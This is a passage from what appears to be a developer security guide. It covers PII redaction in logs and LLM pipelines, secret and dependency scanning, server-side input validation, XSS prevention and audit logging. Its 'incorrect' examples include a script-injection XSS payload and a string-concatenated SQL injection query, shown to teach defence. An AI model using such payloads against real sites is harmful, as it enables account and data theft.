def detect_pii(text: str, language: str = "en") -> list:
return analyzer.analyze(
text=text, language=language,
entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
)
def anonymize_text(text: str, language: str = "en") -> str:
results = analyzer.analyze(text=text, language=language)
return anonymizer.anonymize(text=text, analyzer_results=results).text

Presidio Custom Operators
from presidio_anonymizer.entities import OperatorConfig
operators = {
"PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
"CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
"EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
"US_SSN": OperatorConfig("redact"),
}
anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)

Custom Recognizers
from presidio_analyzer import Pattern, PatternRecognizer
internal_id_recognizer = PatternRecognizer(
supported_entity="INTERNAL_ID",
patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)

LLM Guard Anonymization
from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault
vault = Vault()
scanner = Anonymize(
vault=vault, language="en",
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
use_faker=True, # Replace with fake data
)
def sanitize_input(prompt: str) -> tuple[str, bool, float]:
sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
return sanitized_prompt, is_valid, risk_score
# "My name is Jane Smith" -> "My name is [REDACTED_PERSON_1]"

LLM Guard Output Scanning
from llm_guard.output_scanners import Sensitive
sensitive_scanner = Sensitive(
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
redact=True,
threshold=0.5,
)
def check_output_for_pii(prompt: str, output: str):
sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
return sanitized_output, is_valid, risk_score

Anti-Patterns
# NEVER log raw PII
logger.info(f"User email: {user.email}")
# NEVER send unmasked data to observability
langfuse.trace(input=raw_prompt)
# ALWAYS mask before logging
logger.info(f"User email: {mask_pii(user.email)}")
# ALWAYS use mask callback
langfuse = Langfuse(mask=mask_pii)

Key Decisions
| Decision | Recommendation |
|---|---|
| Detection engine | Presidio (enterprise), regex (simple), LLM Guard (LLM pipelines) |
| Masking strategy | Replace with type tokens [REDACTED_EMAIL] |
| Performance | Async/batch for high-throughput |
| Reversibility | LLM Guard Vault for deanonymization |
Incorrect — Logging raw user input exposes PII to log aggregators:
logger.info(f"Processing request for {user.email}")
# Logs: "Processing request for john.doe@company.com"

Correct — Detect and mask PII before logging using Presidio:
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
results = analyzer.analyze(text=user.email, language="en")
masked = anonymizer.anonymize(text=user.email, analyzer_results=results).text
logger.info(f"Processing request for {masked}")
# Logs: "Processing request for <EMAIL_ADDRESS>"

Redact PII from logs and traces automatically in Langfuse, structlog, and observability tools — HIGH
PII Redaction & Observability Integration
Langfuse Mask Callback
import re
from langfuse import Langfuse
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}
def mask_pii(data: dict) -> dict:
def redact_string(value: str) -> str:
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
return value
def redact_recursive(obj):
if isinstance(obj, str):
return redact_string(obj)
elif isinstance(obj, dict):
return {k: redact_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [redact_recursive(item) for item in obj]
return obj
return redact_recursive(data)
langfuse = Langfuse(mask=mask_pii)

Langfuse with Presidio
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def presidio_mask(data: dict) -> dict:
def anonymize_string(value: str) -> str:
if len(value) < 5:
return value
results = analyzer.analyze(text=value, language="en")
if results:
return anonymizer.anonymize(text=value, analyzer_results=results).text
return value
def process_recursive(obj):
if isinstance(obj, str):
return anonymize_string(obj)
elif isinstance(obj, dict):
return {k: process_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [process_recursive(item) for item in obj]
return obj
return process_recursive(data)
langfuse = Langfuse(mask=presidio_mask)

Structlog PII Processor
import re
import structlog
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}
def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
def redact_value(value):
if isinstance(value, str):
result = value
for entity_type, pattern in PII_PATTERNS.items():
result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
return result
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
structlog.configure(processors=[
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
redact_pii,
structlog.processors.JSONRenderer(),
])

Loguru PII Filter
from loguru import logger
def pii_filter(record):
message = record["message"]
for entity_type, pattern in PII_PATTERNS.items():
message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
record["message"] = message
return True
logger.remove()
logger.add("logs/app.log", filter=pii_filter, serialize=True)
# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from 192.168.1.1"
# (PII_PATTERNS has no IP rule; add an "ip" entry if IP addresses must be redacted)

Field-Specific Redaction
SENSITIVE_FIELDS = {
"email", "phone", "ssn", "credit_card", "password",
"api_key", "token", "secret", "authorization"
}
def smart_redact_processor(logger, method_name, event_dict):
    result = {}
    for key, value in event_dict.items():
        if key.lower() in SENSITIVE_FIELDS:
            result[key] = "[REDACTED]"
        elif isinstance(value, str):
            # Apply the regex patterns defined in PII_PATTERNS above
            redacted = value
            for entity_type, pattern in PII_PATTERNS.items():
                redacted = pattern.sub(f'[REDACTED_{entity_type.upper()}]', redacted)
            result[key] = redacted
        else:
            result[key] = value
    return result

LLM Guard Deanonymization
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize
from llm_guard.vault import Vault
vault = Vault()
anonymize = Anonymize(vault=vault, language="en")
deanonymize = Deanonymize(vault=vault)
# Anonymize input
sanitized_prompt, _, _ = anonymize.scan(original_prompt)
# Call LLM with sanitized input
llm_response = await llm.generate(sanitized_prompt)
# Restore original values in output
restored_output, _, _ = deanonymize.scan(sanitized_prompt, llm_response)

Full Secure Pipeline
from llm_guard.output_scanners import Sensitive

class SecureLLMPipeline:
    def __init__(self, llm):
        self.llm = llm  # injected LLM client used in process()
        self.vault = Vault()
        self.anonymize = Anonymize(vault=self.vault, language="en")
        self.deanonymize = Deanonymize(vault=self.vault)
        self.sensitive_check = Sensitive(redact=True)
async def process(self, user_input: str) -> str:
# 1. Anonymize input
sanitized_input, _, input_risk = self.anonymize.scan(user_input)
# 2. Call LLM with sanitized input
llm_response = await self.llm.generate(sanitized_input)
# 3. Check output for leaked PII
checked_output, _, output_risk = self.sensitive_check.scan(
sanitized_input, llm_response
)
# 4. Deanonymize for user
final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]
return final_output

Testing
from io import StringIO

def test_pii_redaction_in_logs():
    output = StringIO()
structlog.configure(
processors=[redact_pii, structlog.processors.JSONRenderer()],
logger_factory=structlog.WriteLoggerFactory(file=output),
)
logger = structlog.get_logger()
logger.info("test", email="test@example.com", ssn="123-45-6789")
log_output = output.getvalue()
assert "test@example.com" not in log_output
assert "123-45-6789" not in log_output
assert "[REDACTED_EMAIL]" in log_output
assert "[REDACTED_SSN]" in log_output

Incorrect — Sending raw prompts to Langfuse leaks PII to observability platform:
langfuse = Langfuse()
trace = langfuse.trace(
input="My email is john@example.com and SSN is 123-45-6789"
)
# PII stored in Langfuse without redaction

Correct — Mask callback automatically redacts PII before sending to Langfuse:
langfuse = Langfuse(mask=mask_pii)
trace = langfuse.trace(
input="My email is john@example.com and SSN is 123-45-6789"
)
# Stored as: "My email is [REDACTED_EMAIL] and SSN is [REDACTED_SSN]"

Scan dependencies for CVEs, detect committed secrets, and run SAST to catch vulnerabilities before production — CRITICAL
Dependency Scanning
Automate vulnerability detection in package dependencies before deployment.
Incorrect — ignoring audit output:
npm audit # Runs but nobody checks the result
npm install # Proceeds regardless of vulnerabilities

Correct — automated scanning with severity gates:
# JavaScript (npm)
npm audit --json > security-audit.json
CRITICAL=$(jq '.metadata.vulnerabilities.critical' security-audit.json)
HIGH=$(jq '.metadata.vulnerabilities.high' security-audit.json)
if [ "$CRITICAL" -gt 0 ] || [ "$HIGH" -gt 0 ]; then
echo "BLOCK: $CRITICAL critical, $HIGH high vulnerabilities"
exit 1
fi
# Auto-fix safe updates
npm audit fix

# Python (pip-audit)
pip-audit --format=json > security-audit.json
# Alternative: safety
safety check --json > security-audit.json

# Container images (Trivy)
trivy image myapp:latest --format json > trivy-scan.json
CRITICAL=$(cat trivy-scan.json | jq '[.Results[].Vulnerabilities[]? | select(.Severity == "CRITICAL")] | length')

Escalation thresholds:
| Severity | Threshold | Action |
|---|---|---|
| Critical | Any | BLOCK deployment |
| High | > 5 | BLOCK deployment |
| Moderate | > 20 | WARNING |
| Low | > 50 | WARNING |
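The escalation table above could be enforced in a CI gate with a small helper; the function and names below are an illustrative sketch, not part of any scanner's API:

```python
# Mirrors the escalation table: (threshold, action) per severity.
SEVERITY_GATES = {
    "critical": (0, "BLOCK"),   # any critical finding blocks
    "high": (5, "BLOCK"),
    "moderate": (20, "WARNING"),
    "low": (50, "WARNING"),
}

def evaluate_audit(counts: dict) -> list:
    """Return the actions triggered by per-severity vulnerability counts."""
    actions = []
    for severity, (threshold, action) in SEVERITY_GATES.items():
        if counts.get(severity, 0) > threshold:
            actions.append(f"{action}: {severity}")
    return actions
```

A deployment script would fail the build if any "BLOCK" action is returned.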
Key rules:
- Run `npm audit` or `pip-audit` in CI — block on critical/high findings
- Use `--json` output for automation (not human-readable format)
- Container scanning with Trivy catches OS-level vulnerabilities npm/pip miss
- Auto-fix with `npm audit fix` only for non-breaking updates; review breaking fixes manually
Secret Detection
Prevent credentials, API keys, and tokens from being committed to repositories.
Incorrect — relying on .gitignore alone:
# .gitignore only prevents file-level commits, not inline secrets
echo "API_KEY=sk-live-abc123" >> config.py
git add config.py # Secret committed — now in git history forever

Correct — multi-layer secret detection:
# TruffleHog (scans entire git history)
trufflehog git file://. --json > secrets-scan.json
# Gitleaks (fast, pre-commit friendly)
gitleaks detect --source . --report-format json
# Check results
SECRET_COUNT=$(jq -s 'length' secrets-scan.json)  # TruffleHog emits one JSON object per finding
if [ "$SECRET_COUNT" -gt 0 ]; then
echo "BLOCK: $SECRET_COUNT secrets detected!"
exit 1
fi

Pre-commit hooks (most effective layer):
# .pre-commit-config.yaml
repos:
# Gitleaks — fast pattern matching
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
# detect-secrets — supports baselines for false positives
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ["--baseline", ".secrets.baseline"]

Baseline for false positives:
# Generate baseline (marks existing non-secrets)
detect-secrets scan > .secrets.baseline
# Audit false positives interactively
detect-secrets audit .secrets.baseline

Key rules:
- Use pre-commit hooks as first line of defense — catches secrets before they enter history
- TruffleHog for deep history scanning; Gitleaks for fast pre-commit checks
- If a secret is committed, rotate it immediately — removing from history is not enough
- Use `.secrets.baseline` to suppress false positives (e.g., example keys in docs)
- Run both pre-commit AND CI scanning — defense in depth
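For intuition, pattern-based secret detection boils down to regex matching over file contents; the two patterns below are purely illustrative (real scanners like Gitleaks ship hundreds of tuned rules plus entropy checks):

```python
import re

# Illustrative patterns only — not a substitute for a real scanner's rule set.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_api_key": re.compile(r"(?i)api[_-]?key\s*[:=]\s*['\"][^'\"]{16,}['\"]"),
}

def find_secrets(text: str) -> list:
    """Return the names of secret patterns present in the given text."""
    return [name for name, pattern in SECRET_PATTERNS.items() if pattern.search(text)]
```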
Static Analysis (SAST)
Run static application security testing to catch vulnerabilities in source code.
Incorrect — relying only on linters for security:
# ESLint/Pylint catch style issues, not security vulnerabilities
eslint . # Does not detect SQL injection, SSRF, or path traversal

Correct — dedicated SAST tools:
# Semgrep (multi-language, auto rules include OWASP patterns)
semgrep --config=auto --json > semgrep-results.json
CRITICAL=$(cat semgrep-results.json | jq '[.results[] | select(.extra.severity == "ERROR")] | length')
if [ "$CRITICAL" -gt 0 ]; then
echo "BLOCK: $CRITICAL critical SAST findings"
exit 1
fi

# Bandit (Python-specific)
bandit -r . -f json -o bandit-report.json
HIGH=$(cat bandit-report.json | jq '[.results[] | select(.issue_severity == "HIGH")] | length')

Pre-commit integration (shift-left):
# .pre-commit-config.yaml
repos:
- repo: https://github.com/semgrep/semgrep
rev: v1.52.0
hooks:
- id: semgrep
args: ["--config", "auto", "--error"]
- repo: https://github.com/PyCQA/bandit
rev: 1.7.7
hooks:
- id: bandit
args: ["-c", "pyproject.toml", "-r", "."]
exclude: ^tests/

CI integration:
# GitHub Actions
- name: SAST scan
run: |
semgrep --config=auto --json > sast.json
ERRORS=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' sast.json)
if [ "$ERRORS" -gt 0 ]; then
echo "::error::$ERRORS critical SAST findings"
exit 1
fi

Key rules:
- Use `semgrep --config=auto` for broad OWASP coverage across languages
- Bandit is Python-specific — pair with Semgrep for multi-language projects
- Run SAST in pre-commit hooks (shift-left) AND CI (enforce)
- Block on ERROR severity; WARNING findings go to review queue
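The jq filter used in the CI snippet can equally be done in Python. Field names here assume Semgrep's JSON report layout (`results[].extra.severity`); verify against the report version you actually produce:

```python
import json

def count_findings(report_text: str, severity: str = "ERROR") -> int:
    """Count Semgrep findings at the given severity in a JSON report string."""
    report = json.loads(report_text)
    return sum(
        1
        for result in report.get("results", [])
        if result.get("extra", {}).get("severity") == severity
    )
```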
Validate input with server-side schemas using Zod and Pydantic with allowlist patterns — HIGH
Input Schema Validation
Core Principles
- Never trust user input
- Validate on server-side (client-side is UX only)
- Use allowlists (not blocklists)
- Validate type, length, format, range
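Before the library examples, a dependency-free sketch of the same idea — type, length, format, and range checks against an allowlist (the regex and limits are illustrative, not production-grade email validation):

```python
import re

ALLOWED_ROLES = {"user", "admin"}  # allowlist, not a blocklist
EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+\.[\w.-]+$")

def validate_user(payload: dict) -> dict:
    """Return a dict of field errors; an empty dict means the payload is valid."""
    errors = {}
    email = payload.get("email")
    if not isinstance(email, str) or not EMAIL_RE.match(email):
        errors["email"] = "invalid format"
    name = payload.get("name")
    if not isinstance(name, str) or not (2 <= len(name) <= 100):
        errors["name"] = "must be 2-100 characters"
    if payload.get("role", "user") not in ALLOWED_ROLES:
        errors["role"] = "not in allowlist"
    return errors
```

Zod and Pydantic below do exactly this, plus coercion, nesting, and typed results.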
Zod v4 Schema
import { z } from 'zod';
const UserSchema = z.object({
email: z.string().email(),
name: z.string().min(2).max(100),
age: z.coerce.number().int().min(0).max(150),
role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({ errors: result.error.flatten() });
}

Type Coercion (v4)
// Query params come as strings - coerce to proper types
z.coerce.number() // "123" -> 123
z.coerce.boolean() // "true" -> true
z.coerce.date() // "2024-01-01" -> Date

Pydantic (Python)
from pydantic import BaseModel, EmailStr, Field, field_validator
class User(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def strip_and_title(cls, v: str) -> str:
return v.strip().title()

Express Middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({
error: 'Validation failed',
details: result.error.flatten().fieldErrors,
});
}
req.body = result.data;
next();
};
}
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
const user = req.body; // fully typed and validated
});

Query Parameter Validation
const PaginationSchema = z.object({
page: z.coerce.number().int().positive().default(1),
limit: z.coerce.number().int().min(1).max(100).default(20),
sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
order: z.enum(['asc', 'desc']).default('desc'),
});

Anti-Patterns
// NEVER rely on client-side validation only
if (formIsValid) submit(); // No server validation
// NEVER use blocklists
const blocked = ['password', 'secret']; // Easy to miss fields
// NEVER build queries with string concat
"SELECT * FROM users WHERE name = '" + name + "'" // SQL injection
// ALWAYS validate server-side
const result = schema.safeParse(req.body);
// ALWAYS use allowlists
const allowed = ['name', 'email', 'createdAt'];
// ALWAYS use parameterized queries
db.query('SELECT * FROM users WHERE name = ?', [name]);

Key Decisions
| Decision | Recommendation |
|---|---|
| Validation library | Zod (TS), Pydantic (Python) |
| Strategy | Allowlist over blocklist |
| Location | Server-side always |
| Error messages | Generic (don't leak info) |
Incorrect — Trusting client-side validation allows attackers to bypass checks:
// Client-side only
const email = document.getElementById('email').value;
if (email.includes('@')) {
await fetch('/api/users', { method: 'POST', body: JSON.stringify({ email }) });
}
// Attacker can bypass with curl/Postman

Correct — Server-side schema validation with Zod ensures all input is validated:
app.post('/api/users', validateBody(z.object({
email: z.string().email(),
})), async (req, res) => {
// req.body.email is validated regardless of client
});

Validation: Output Encoding & XSS Prevention — HIGH
Output Encoding & XSS Prevention
HTML Sanitization (Python)
from markupsafe import escape
@app.route('/comment', methods=['POST'])
def create_comment():
content = escape(request.form['content'])
db.execute("INSERT INTO comments (content) VALUES (?)", [content])

HTML Sanitization (JavaScript)
import DOMPurify from 'dompurify';
// Sanitize HTML input with allowed tags
const sanitizedHtml = DOMPurify.sanitize(userInput, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href'],
});

XSS Prevention
Safe — textContent and React auto-escaping:
// SAFE: textContent escapes HTML entities
element.textContent = userInput;
// React is safe by default
<div>{userInput}</div> // Auto-escaped

Dangerous — innerHTML and dangerouslySetInnerHTML bypass escaping:
// DANGEROUS: innerHTML can execute scripts
element.innerHTML = userInput; // NEVER do this with user input
// DANGEROUS: bypasses React escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

Server-Side XSS Prevention (Flask)
from flask import request, render_template_string
from markupsafe import escape
@app.route('/greet')
def greet():
name = request.args.get('name', '')
return f"<h1>Hello, {escape(name)}!</h1>"
# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
return render_template_string(
"<h1>Hello, {{ name }}!</h1>",
name=request.args.get('name', '')
)

Security Headers
SECURITY_HEADERS = {
"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "DENY",
"X-XSS-Protection": "1; mode=block",
"Referrer-Policy": "strict-origin-when-cross-origin",
"Content-Security-Policy": "default-src 'self'",
}
@app.after_request
def add_security_headers(response):
for header, value in SECURITY_HEADERS.items():
response.headers[header] = value
return response

SRI for CDN Scripts
<script src="https://cdn.example.com/lib.js"
integrity="sha384-..."
crossorigin="anonymous"></script>

Anti-Patterns
// NEVER use innerHTML with user input
element.innerHTML = userInput;
// NEVER use dangerouslySetInnerHTML without sanitization
<div dangerouslySetInnerHTML={{__html: userInput}} />
// NEVER trust Content-Type header for file validation
if (file.type === 'image/png') {...} // Can be spoofed
// ALWAYS use textContent or DOMPurify
element.textContent = userInput;
const safe = DOMPurify.sanitize(userInput);

Incorrect — Using innerHTML with user content allows XSS script injection:
const userComment = "<script>alert('XSS')</script>";
element.innerHTML = userComment;
// Script executes, stealing cookies/tokens

Correct — Using textContent automatically escapes HTML and prevents XSS:
const userComment = "<script>alert('XSS')</script>";
element.textContent = userComment;
// Renders as plain text: "<script>alert('XSS')</script>"

Validation: Advanced Schemas & File Validation — HIGH
Advanced Schemas & File Validation
Discriminated Unions
const NotificationSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('email'),
email: z.string().email(),
subject: z.string().min(1),
body: z.string().min(1),
}),
z.object({
type: z.literal('sms'),
phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
message: z.string().max(160),
}),
z.object({
type: z.literal('push'),
deviceToken: z.string().min(1),
title: z.string().max(50),
body: z.string().max(200),
}),
]);

File Upload Validation
const FileUploadSchema = z.object({
filename: z.string().min(1).max(255),
mimeType: z.enum([
'image/jpeg', 'image/png', 'image/webp', 'application/pdf',
]),
size: z.number().max(10 * 1024 * 1024, 'File must be under 10MB'),
});
// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
'image/jpeg': [0xFF, 0xD8, 0xFF],
'image/png': [0x89, 0x50, 0x4E, 0x47],
'image/webp': [0x52, 0x49, 0x46, 0x46],
'application/pdf': [0x25, 0x50, 0x44, 0x46],
};
function validateFileContent(buffer: Buffer, mimeType: string): boolean {
const expected = imageMagicBytes[mimeType];
if (!expected) return false;
return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist
const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;
const SafeUrlSchema = z.string()
.url()
.refine(
(url) => {
const { hostname, protocol } = new URL(url);
return protocol === 'https:' &&
(ALLOWED_DOMAINS as readonly string[]).includes(hostname);
},
{ message: 'URL must be HTTPS and from allowed domains' }
);

Form Validation with React Hook Form
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const SignupSchema = z.object({
email: z.string().email('Invalid email'),
password: z.string()
.min(8, 'Password must be at least 8 characters')
.regex(/[A-Z]/, 'Must contain uppercase')
.regex(/[0-9]/, 'Must contain number'),
confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
message: "Passwords don't match",
path: ['confirmPassword'],
});
function SignupForm() {
const { register, handleSubmit, formState: { errors } } = useForm({
resolver: zodResolver(SignupSchema),
});
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} />
{errors.email && <span>{errors.email.message}</span>}
<input type="password" {...register('password')} />
<button type="submit">Sign Up</button>
</form>
);
}

Allowlist Pattern
// Only allow specific sort columns
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);
// Dynamic allowlist factory
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
return z.enum(allowed as [T, ...T[]]);
}

Python Discriminated Union
from pydantic import BaseModel, EmailStr, Field
from typing import Literal, Union
class EmailNotification(BaseModel):
type: Literal['email']
email: EmailStr
subject: str
body: str
class SMSNotification(BaseModel):
type: Literal['sms']
phone: str
message: str = Field(max_length=160)
Notification = Union[EmailNotification, SMSNotification]

Key Decisions
| Decision | Recommendation |
|---|---|
| File validation | Check magic bytes, not just extension |
| URL validation | HTTPS + domain allowlist |
| Polymorphic data | Discriminated unions |
| Form validation | Zod + React Hook Form |
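The magic-byte check from the TypeScript example, sketched in Python (the signature table is abbreviated; extend it for the types you actually accept):

```python
# Leading "magic" bytes per MIME type (abbreviated set).
MAGIC_BYTES = {
    "image/jpeg": bytes([0xFF, 0xD8, 0xFF]),
    "image/png": bytes([0x89, 0x50, 0x4E, 0x47]),
    "application/pdf": b"%PDF",
}

def matches_declared_type(data: bytes, mime_type: str) -> bool:
    """True only if the file content starts with the signature for mime_type."""
    expected = MAGIC_BYTES.get(mime_type)
    return expected is not None and data.startswith(expected)
```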
Incorrect — Trusting file extension or MIME type allows malicious file uploads:
if (file.name.endsWith('.png') && file.type === 'image/png') {
await uploadFile(file); // Can be spoofed by renaming .exe to .png
}

Correct — Validating magic bytes ensures file content matches declared type:
const buffer = await file.arrayBuffer();
const bytes = new Uint8Array(buffer);
const isPNG = bytes[0] === 0x89 && bytes[1] === 0x50 && bytes[2] === 0x4E;
if (isPNG) {
await uploadFile(file); // Verified actual PNG file
}

Audit Logging
Purpose
Audit logs answer: Who did What, When, Where, and Why?
They're required for:
- Security incident investigation
- Compliance (SOC2, GDPR, HIPAA)
- Debugging production issues
- Usage analytics
What to Log
Always Log (Audit Events)
| Event Type | What to Log | Example |
|---|---|---|
| Authentication | Success/failure, method | "User login via OAuth" |
| Authorization | Decision, resource, action | "Access granted to analysis_123" |
| Data Access | Read/write, resource type | "Read 10 documents" |
| Data Modification | Before/after (hashed), resource | "Updated analysis status" |
| LLM Calls | Model, tokens, latency (NOT prompt) | "GPT-4, 1500 tokens, 2.3s" |
| Errors | Type, context (sanitized) | "ValidationError on /api/analyze" |
Never Log (Sensitive Data)
| Data Type | Why Not | Alternative |
|---|---|---|
| Passwords | Security | Log "password changed" event |
| API Keys | Security | Log key ID, not value |
| Full Prompts | May contain PII | Log prompt hash, token count |
| LLM Responses | May contain generated PII | Log response hash, length |
| User Content | Privacy | Log content hash, length |
| PII | GDPR/Privacy | Log anonymized or redacted |
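The "log a hash, not the content" rule from the table above can be sketched as a tiny helper:

```python
import hashlib

def loggable_digest(content: str) -> dict:
    """Return a short fingerprint and length that are safe to put in logs."""
    return {
        "content_hash": hashlib.sha256(content.encode()).hexdigest()[:16],
        "content_length": len(content),
    }
```

The hash lets you correlate log entries referring to the same prompt or response without ever storing the text itself.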
Implementation
Sanitized Logger
import structlog
import re
import hashlib
from typing import Any
class SanitizedLogger:
"""Logger that automatically redacts sensitive data"""
REDACT_PATTERNS = {
r"password": "[PASSWORD_REDACTED]",
r"api[_-]?key": "[API_KEY_REDACTED]",
r"secret": "[SECRET_REDACTED]",
r"token": "[TOKEN_REDACTED]",
r"authorization": "[AUTH_REDACTED]",
r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
}
HASH_FIELDS = {"prompt", "response", "content"}
def __init__(self):
self._logger = structlog.get_logger()
def _sanitize(self, data: dict[str, Any]) -> dict[str, Any]:
"""Sanitize sensitive fields"""
result = {}
for key, value in data.items():
# Hash content fields instead of logging
if key.lower() in self.HASH_FIELDS:
result[f"{key}_hash"] = hashlib.sha256(
str(value).encode()
).hexdigest()[:16]
result[f"{key}_length"] = len(str(value))
continue
# Redact sensitive patterns
str_value = str(value)
for pattern, replacement in self.REDACT_PATTERNS.items():
if re.search(pattern, key, re.IGNORECASE):
result[key] = replacement
break
str_value = re.sub(pattern, replacement, str_value, flags=re.IGNORECASE)
else:
result[key] = str_value
return result
def audit(self, event: str, **kwargs):
"""Log an audit event with automatic sanitization"""
sanitized = self._sanitize(kwargs)
self._logger.info(
event,
audit=True,
**sanitized,
)
def info(self, msg: str, **kwargs):
self._logger.info(msg, **self._sanitize(kwargs))
def error(self, msg: str, **kwargs):
self._logger.error(msg, **self._sanitize(kwargs))

Audit Event Structure
from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from uuid import UUID
class AuditAction(Enum):
CREATE = "create"
READ = "read"
UPDATE = "update"
DELETE = "delete"
LOGIN = "login"
LOGOUT = "logout"
LLM_CALL = "llm_call"
SEARCH = "search"
@dataclass
class AuditEvent:
"""Structured audit event"""
# WHO
user_id: UUID
tenant_id: UUID
session_id: str
# WHAT
action: AuditAction
resource_type: str
resource_id: UUID | None
# WHEN
timestamp: datetime
# WHERE
request_id: str
trace_id: str
ip_address: str
user_agent: str
# OUTCOME
success: bool
error_code: str | None = None
# CONTEXT (sanitized)
metadata: dict | None = None

Usage in OrchestKit
# Authentication
logger.audit(
"user.login",
user_id=user.id,
tenant_id=user.tenant_id,
method="oauth",
success=True,
)
# Data Access
logger.audit(
"documents.search",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
query_hash=hash(query), # Not the actual query
result_count=len(results),
success=True,
)
# LLM Call
logger.audit(
"llm.generate",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
model="gpt-4",
input_tokens=1500,
output_tokens=500,
latency_ms=2300,
prompt_hash=hash(prompt), # Not the actual prompt!
success=True,
)
# Authorization Failure
logger.audit(
"authorization.denied",
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
action="analysis:delete",
resource_id=analysis_id,
reason="missing permission",
success=False,
)

Log Retention
| Environment | Retention | Reason |
|---|---|---|
| Development | 7 days | Debugging |
| Staging | 30 days | Testing |
| Production | 1 year | Compliance |
| Security Events | 7 years | Legal requirements |
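The retention table could back a cleanup job; this is a minimal sketch with hypothetical environment keys mirroring the table:

```python
from datetime import datetime, timedelta, timezone

# Retention windows from the table above.
RETENTION = {
    "development": timedelta(days=7),
    "staging": timedelta(days=30),
    "production": timedelta(days=365),
    "security": timedelta(days=365 * 7),
}

def is_expired(logged_at: datetime, environment: str, now: datetime) -> bool:
    """True if a log record is past its retention window for this environment."""
    return now - logged_at > RETENTION[environment]
```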
Integration with Langfuse
from langfuse import Langfuse
langfuse = Langfuse()
# Create trace for observability
trace = langfuse.trace(
name="analysis",
user_id=str(ctx.user_id), # Langfuse supports user tracking
session_id=ctx.session_id,
metadata={
"tenant_id": str(ctx.tenant_id),
"request_id": ctx.request_id,
},
)
# Log LLM call
generation = trace.generation(
name="content_analysis",
model="gpt-4",
input=prompt, # Langfuse handles securely
output=response,
)Compliance Considerations
GDPR
- Log data access but not the data itself
- Provide audit trail for subject access requests
- Log data deletion events
SOC2
